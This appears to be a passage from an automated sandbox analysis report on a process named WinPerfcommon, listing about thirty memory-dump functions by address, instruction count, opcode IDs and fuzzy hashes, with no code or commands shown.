                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5736cd721de71bebe0fb3f1faf38f30f37ee3a08b619418528994395c048c457
                                                                                      • Instruction ID: 2c4189bd8525f065b3fd25b6b6a489095b374764cdd16dbb9a6050372acdc2e4
                                                                                      • Opcode Fuzzy Hash: 5736cd721de71bebe0fb3f1faf38f30f37ee3a08b619418528994395c048c457
                                                                                      • Instruction Fuzzy Hash: 2641623260C9498FDF99EB6CC4A5DB877E1FBA831074505AED04EC32A2DE25F845CB81
                                                                                      Function 00007FFD9BC1B341 Relevance: .1, Instructions: 120COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: acffa5376c14e7c4599a07c1bf7da3a89882622ce7614bf54d2ade2459a13233
                                                                                      • Instruction ID: 628da93a365d2c072f4dab3672dce51f42e79e17243092bbbb8cc0950e274e60
                                                                                      • Opcode Fuzzy Hash: acffa5376c14e7c4599a07c1bf7da3a89882622ce7614bf54d2ade2459a13233
                                                                                      • Instruction Fuzzy Hash: AA317F3260C9498FDB99EB28C0A5EB477E1EBA931074505AED04EC72A2DE24E841CB81
                                                                                      Function 00007FFD9BC15CD1 Relevance: .1, Instructions: 120COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3fe0598285f0f25cc3798efa0443e8e07f0fafc23df97b7724b9f6d87b782482
                                                                                      • Instruction ID: 81ef5b4f7eeaeb1b5c6b7b54b4de7aefac19379a9411359ebc35ecc6c0dd0a3e
                                                                                      • Opcode Fuzzy Hash: 3fe0598285f0f25cc3798efa0443e8e07f0fafc23df97b7724b9f6d87b782482
                                                                                      • Instruction Fuzzy Hash: 0231703160CA498FDF5CEF2CC4A5E6477E1FBA9310B0505AED05AC7292DE25F881CB91
                                                                                      Function 00007FFD9B80090D Relevance: .1, Instructions: 115COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1817243924.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b800000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9fd14973c4804ba83fbeda981fb2125093c1114f0bdf28ab18103f8355ec35e2
                                                                                      • Instruction ID: 39a62162e10c3dfb36de89c6de521005dcc17431537d433485435aa08c54b3a6
                                                                                      • Opcode Fuzzy Hash: 9fd14973c4804ba83fbeda981fb2125093c1114f0bdf28ab18103f8355ec35e2
                                                                                      • Instruction Fuzzy Hash: FA317A12F0D69A1EE319B3BC60AE5FC2790DF89325B2544BFE04EC71FBDD1868818285
                                                                                      Function 00007FFD9BC1B2DB Relevance: .1, Instructions: 115COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 26aa77451e15e4005429751751f6caa76589cfb072be4840105545350726cd88
                                                                                      • Instruction ID: a33f5ca48e14219533af0e96e27ff6b5ab91b43c43da9acef1aa0cde0686576d
                                                                                      • Opcode Fuzzy Hash: 26aa77451e15e4005429751751f6caa76589cfb072be4840105545350726cd88
                                                                                      • Instruction Fuzzy Hash: 5831813260C9498FDF99EF28C0A5EB477E1FBA831074505AED04EC72A2DE24F841CB81
                                                                                      Function 00007FFD9BC15C6B Relevance: .1, Instructions: 115COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7c0cd6e50d879dc2565949e8a23ca47bbe94d8296051d0f90710e1b17613f320
                                                                                      • Instruction ID: 683802585df403f668e680c785f33b03f4e8cbb5f5406d2572c644a812ffc722
                                                                                      • Opcode Fuzzy Hash: 7c0cd6e50d879dc2565949e8a23ca47bbe94d8296051d0f90710e1b17613f320
                                                                                      • Instruction Fuzzy Hash: DE31613160C9498FDF5CEF28C465EA577E1FBA9310B0505ADD05AC7292DE25F881CB81
                                                                                      Function 00007FFD9BC1F280 Relevance: .1, Instructions: 112COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0dd4c7378a9de84e786d4cd47500dae9a27cd14f72689e945052d4c903bf14e5
                                                                                      • Instruction ID: d6e4c037ea65fb9e1d8042763e5be826a3bd79f90b3d6c566ce301d77433d719
                                                                                      • Opcode Fuzzy Hash: 0dd4c7378a9de84e786d4cd47500dae9a27cd14f72689e945052d4c903bf14e5
                                                                                      • Instruction Fuzzy Hash: 8D314C30A1D85E4EEB78D66884706FC77A1FF50300F5545BAC04EDB2E6DD38BA858741
                                                                                      Function 00007FFD9BC1D6BD Relevance: .1, Instructions: 104COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: dc12a42e593e356754b01f90f17e1049819c9aa8c70e6383fcd53d5ff7ba3b3d
                                                                                      • Instruction ID: 0c48688bee06946b10d81c55b9051e9cc38ca8319aaff9df7ef16876be1e1623
                                                                                      • Opcode Fuzzy Hash: dc12a42e593e356754b01f90f17e1049819c9aa8c70e6383fcd53d5ff7ba3b3d
                                                                                      • Instruction Fuzzy Hash: E3317C71B0D90A4FDB58EAA8D4A19ACB7A1FF54310B159239D05EE3692CF24B952CB80
                                                                                      Function 00007FFD9BC111D1 Relevance: .1, Instructions: 101COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d7c31cddae2ba20c3fff4d317bad69b862f2c4351cdca7f98ed7bfa5877c516e
                                                                                      • Instruction ID: 203649f3c29ba24147dd00b3ed3f3e7138c383963299bc739c4f2fd9d0673b86
                                                                                      • Opcode Fuzzy Hash: d7c31cddae2ba20c3fff4d317bad69b862f2c4351cdca7f98ed7bfa5877c516e
                                                                                      • Instruction Fuzzy Hash: B131F730E1E68D9FDB55CBA8C8609FCBFB1FF59300F1501BAD049E71A2DA286945C711
                                                                                      Function 00007FFD9BC1840D Relevance: .1, Instructions: 99COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 256ac1a36631c8ef2dcc4f47650a26c7d741392992d4d08a96e9492533753fa8
                                                                                      • Instruction ID: f6e416cc689ae1bd40e142d01c932fc1f2990fd5ad1e1abc904070313272a812
                                                                                      • Opcode Fuzzy Hash: 256ac1a36631c8ef2dcc4f47650a26c7d741392992d4d08a96e9492533753fa8
                                                                                      • Instruction Fuzzy Hash: 3D319031B1D90E8FDB58DBA8D4B19B8B3A2FF58310B554139D05EA3692CF20BD12CB80
                                                                                      Function 00007FFD9BC184CA Relevance: .1, Instructions: 98COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7c184d05de3f2238d03adeeba38c047f6e3f148adce8b15a83e9a99ba81e7a36
                                                                                      • Instruction ID: 5a2ebd350295da2cd3a55c8caf65bcece47115d1f867aa814a3abb686137ff59
                                                                                      • Opcode Fuzzy Hash: 7c184d05de3f2238d03adeeba38c047f6e3f148adce8b15a83e9a99ba81e7a36
                                                                                      • Instruction Fuzzy Hash: 8231F472F0D54E4FE769ABB884712ECB7D1FF95310F46017AD05EE22D2ED1469018281
                                                                                      Function 00007FFD9BC12DAB Relevance: .1, Instructions: 97COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7b9563d7c419a8728164f9b22473fa8035a5b7aa18b4a54b077e92e36ec43fed
                                                                                      • Instruction ID: fd55b0f7da138387e6e3453ea60e76f0e04f679d1d301978cfb58828925b4bc9
                                                                                      • Opcode Fuzzy Hash: 7b9563d7c419a8728164f9b22473fa8035a5b7aa18b4a54b077e92e36ec43fed
                                                                                      • Instruction Fuzzy Hash: 4C316171B1991E8FDB58DBA8C4A19A8F3A2FF48304B158179D05ED7692CF20BD12CB84
                                                                                      Function 00007FFD9BC15A35 Relevance: .1, Instructions: 95COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7b4523ba25936ae42f25c26e87053f16525fc7797ddfc6bbcfbaa87c2bb0bdcb
                                                                                      • Instruction ID: b4e6f96d2a0400e20f65d80326325d577f92e6bfad93dec81154a7288aeb5547
                                                                                      • Opcode Fuzzy Hash: 7b4523ba25936ae42f25c26e87053f16525fc7797ddfc6bbcfbaa87c2bb0bdcb
                                                                                      • Instruction Fuzzy Hash: 5E312A30F5A54E8FEBA8DBA484A15BD77B1FF44300F5210BBD01EE22A1DB387A408B41
                                                                                      Function 00007FFD9BC1B0A5 Relevance: .1, Instructions: 95COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8b5cacaadbb0eb1c3bb9bd2f9837015eed9d20ad79f7a9267653a8a350990ea0
                                                                                      • Instruction ID: 902cf6db7e5adb41e3fad66a366618e121bf7c73a83194206ab4ed9b3ba67052
                                                                                      • Opcode Fuzzy Hash: 8b5cacaadbb0eb1c3bb9bd2f9837015eed9d20ad79f7a9267653a8a350990ea0
                                                                                      • Instruction Fuzzy Hash: 3F313230A1E54ECFDB68DFA484A56BD77B1FF44300F62147AD40EE61A1DF386A409B41
                                                                                      Function 00007FFD9B80116D Relevance: .1, Instructions: 92COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1817243924.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b800000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 86a5dddfa01c3b3edca5d2092f31fee0fed8fdaf706208346d387159b2c2df08
                                                                                      • Instruction ID: 98cbd044e6a439fbad598982e84646fddd00b21c9821f00e610fcbb7f04413dd
                                                                                      • Opcode Fuzzy Hash: 86a5dddfa01c3b3edca5d2092f31fee0fed8fdaf706208346d387159b2c2df08
                                                                                      • Instruction Fuzzy Hash: 9A31A430A0954E8FDB49FB68C864EE977F0FF5A310B0505BAD00AD72A6DB38A540CB50
                                                                                      Function 00007FFD9B800998 Relevance: .1, Instructions: 91COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1817243924.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b800000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2d65a503d363804d49e46a5f117df318b1c4f3f4494c9a41668095aad0a14135
                                                                                      • Instruction ID: 266ac0fb958f87ed6524e15c1452ee31d0a27f371863c1837b603eda6f8d209a
                                                                                      • Opcode Fuzzy Hash: 2d65a503d363804d49e46a5f117df318b1c4f3f4494c9a41668095aad0a14135
                                                                                      • Instruction Fuzzy Hash: 39212620B1D91D1FF798E76C946AAB972C2EF9D311B5100BDE84DC33E6DC28AC418245
                                                                                      Function 00007FFD9BC1D793 Relevance: .1, Instructions: 90COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 46e9777173ee128ba61aec02fb67fbc6c8dd91f91770245f5cf1077f6a2548c1
                                                                                      • Instruction ID: 39436b4a610e1081613a4d724766f048eec83e9c617f401dfc9dc4681d66dee1
                                                                                      • Opcode Fuzzy Hash: 46e9777173ee128ba61aec02fb67fbc6c8dd91f91770245f5cf1077f6a2548c1
                                                                                      • Instruction Fuzzy Hash: 75213431F0E68D4FEB69A7B888222AC7BE0EF45310F0511BAD05ED72E7D91869068391
                                                                                      Function 00007FFD9BC18345 Relevance: .1, Instructions: 88COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f4ca8bc51193c34fcda50e335e2f5f2e175a1fbf6d8e76f445f2d4e7fc200054
                                                                                      • Instruction ID: 6155ac7ff7ccb496ed54eee1ebcb087da0eca2b0bba1de8f55e94be820b20154
                                                                                      • Opcode Fuzzy Hash: f4ca8bc51193c34fcda50e335e2f5f2e175a1fbf6d8e76f445f2d4e7fc200054
                                                                                      • Instruction Fuzzy Hash: 2521F472A0E64D8FEB748AB448641BD77A0EF55340F4A127AD80DF72A1EE642A058381
                                                                                      Function 00007FFD9BC10198 Relevance: .1, Instructions: 88COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 34f9aa677f7d81238e2082545572b31c9c8f8dfd5b7bf9921f179a42e5ab1269
                                                                                      • Instruction ID: f83f19bb20882c41e0cac1f94dafff14a3c8095519b83c590df873d2a6f92c31
                                                                                      • Opcode Fuzzy Hash: 34f9aa677f7d81238e2082545572b31c9c8f8dfd5b7bf9921f179a42e5ab1269
                                                                                      • Instruction Fuzzy Hash: 48311630E1E90ECFEBA8DBA884A55BD76B1FF44700F59417BD40ED21A1DA38BA009A41
                                                                                      Function 00007FFD9BC19F90 Relevance: .1, Instructions: 87COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 958e7167a2ffbc727ede2e3f048fe49203aa1a5b04b9f2ce5203fab74b606679
                                                                                      • Instruction ID: 9510e4f5a79867e2431cf2cd64cc12e2b1e1b84b1be769c40ec786f7afb0896e
                                                                                      • Opcode Fuzzy Hash: 958e7167a2ffbc727ede2e3f048fe49203aa1a5b04b9f2ce5203fab74b606679
                                                                                      • Instruction Fuzzy Hash: 73313E10A1D59E8BE33982B844745B87F91EF52300B1956BAE0D7DB4F7D92C75819381
                                                                                      Function 00007FFD9BC14921 Relevance: .1, Instructions: 87COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3a7600fa3bcd62fdcced16ab24d57707c7014cc4b87e810acf27308b116697f2
                                                                                      • Instruction ID: 77cf1634eb4847303f4c9b9c9d403c3675e9b2be4ec700076b724b66f59a5c80
                                                                                      • Opcode Fuzzy Hash: 3a7600fa3bcd62fdcced16ab24d57707c7014cc4b87e810acf27308b116697f2
                                                                                      • Instruction Fuzzy Hash: 95314910B1F5DA5BE339866844745787B91EF43301B1A56BEC09ADB4ABC82CB981CB41
                                                                                      Function 00007FFD9B800C25 Relevance: .1, Instructions: 85COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1817243924.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b800000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 54ed7f765b350fe6e22b9e36395c1eb68ac85298de9d6f715fd7012f40802a36
                                                                                      • Instruction ID: 88c461467ace69dbae74fa174cf67fbadfa59333b043e1e4dd5386f3e9c6c3e9
                                                                                      • Opcode Fuzzy Hash: 54ed7f765b350fe6e22b9e36395c1eb68ac85298de9d6f715fd7012f40802a36
                                                                                      • Instruction Fuzzy Hash: FB212C26F1E28D8AE311A7B898250EC3770DF46365F1681B3D084C61E3DD382646C791
                                                                                      Function 00007FFD9BC11D42 Relevance: .1, Instructions: 84COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 63806c678a81082969a610564ab2183a782b20b42148a873e0a574d7b4fd75e3
                                                                                      • Instruction ID: 6d22079ac12980c50b60509f4fb72a78bc9fdd579f66d2bda03deba87ccb1be6
                                                                                      • Opcode Fuzzy Hash: 63806c678a81082969a610564ab2183a782b20b42148a873e0a574d7b4fd75e3
                                                                                      • Instruction Fuzzy Hash: 2A21FB31E1991D8FDF99EB58C4A5AFCB7B1FF58314F0101AAD00EE3295CA35AA41CB40
                                                                                      Function 00007FFD9BC12823 Relevance: .1, Instructions: 83COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d2f26ef8bae4e3daf16b3c476d84548470b3e95082acfbf02a35374d7b756d93
                                                                                      • Instruction ID: 300e8cfdbf3e3a8b671b97859855beb74e78a2003f94931a5e021d8d2dd4c8ea
                                                                                      • Opcode Fuzzy Hash: d2f26ef8bae4e3daf16b3c476d84548470b3e95082acfbf02a35374d7b756d93
                                                                                      • Instruction Fuzzy Hash: 3821D335F0C64D8FEBA8DBA8C8A567DB3E1FF49315F0110B9D04ED75A1CA25AD418B50
                                                                                      Function 00007FFD9BC168BD Relevance: .1, Instructions: 80COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 359e2a530973b36d51bd97db3cdbef6a34574cde56492dbcb0a56944e6a710e5
                                                                                      • Instruction ID: a894aabc5675d2d0eadaa0a6ac83107b97cb6debc30a8044784261e2306c9eb2
                                                                                      • Opcode Fuzzy Hash: 359e2a530973b36d51bd97db3cdbef6a34574cde56492dbcb0a56944e6a710e5
                                                                                      • Instruction Fuzzy Hash: D1214C71A1D95E8FDB94DFA8C8605FCBBB1FF58300F51117AE01AE72A1DA256905C710
                                                                                      Function 00007FFD9BC12EA5 Relevance: .1, Instructions: 72COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 075151e7d65fedfe6e076cbc894ab027a923c2fce27649d8ab1cc7243d13fdc4
                                                                                      • Instruction ID: f978d6aaa263d423a35bc97eb9658df4aadafb7205021dd23a3a3dcdb5f6a400
                                                                                      • Opcode Fuzzy Hash: 075151e7d65fedfe6e076cbc894ab027a923c2fce27649d8ab1cc7243d13fdc4
                                                                                      • Instruction Fuzzy Hash: 6211E471A1EA584FEB55FBF498665EC77A0EF1A310F05017DC04AD71E3DA286946C700
                                                                                      Function 00007FFD9BC101D0 Relevance: .1, Instructions: 72COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3786debcf463240d93e227b12791d4fc8878b45f63f08dc519477eb647291f35
                                                                                      • Instruction ID: 2c1210f38ef392cc61e7ae70969c2efde1e7435efa002cd189cc1253cfa1701c
                                                                                      • Opcode Fuzzy Hash: 3786debcf463240d93e227b12791d4fc8878b45f63f08dc519477eb647291f35
                                                                                      • Instruction Fuzzy Hash: 7821D820B1D46F46F738C26880705FC7291EF90305B6A9679D05FDB6EAD82CBA829780
                                                                                      Function 00007FFD9BC12887 Relevance: .1, Instructions: 72COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ffc118af2fba2a1dd972b898873a5e6bf387a0bfb547f92f2b59d80308413930
                                                                                      • Instruction ID: 6d5f1f31a327c8c23f4c6b389af9ebdf138473441d68d1d51656d8a69a6dae3f
                                                                                      • Opcode Fuzzy Hash: ffc118af2fba2a1dd972b898873a5e6bf387a0bfb547f92f2b59d80308413930
                                                                                      • Instruction Fuzzy Hash: D4118130B08A1C8FDB98DF58D895AA8B3E1FF59315F0141AED04ED76A6CA31AD41CB41
                                                                                      Function 00007FFD9BC1C669 Relevance: .1, Instructions: 71COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fcb0121ec5dc2ec4c79e7e7dc05fe9950ec0c50fa80b4d66e49f61cb7448ca32
                                                                                      • Instruction ID: 2c603052753575c5222d4868c242bfb6b0c224bb4ed066b77c550a579d0a7456
                                                                                      • Opcode Fuzzy Hash: fcb0121ec5dc2ec4c79e7e7dc05fe9950ec0c50fa80b4d66e49f61cb7448ca32
                                                                                      • Instruction Fuzzy Hash: 0A211D71E1950D9FDB9CDB68C4A5AADB7B1FF58301F0111BDE00EE76A1DE34A9418B40
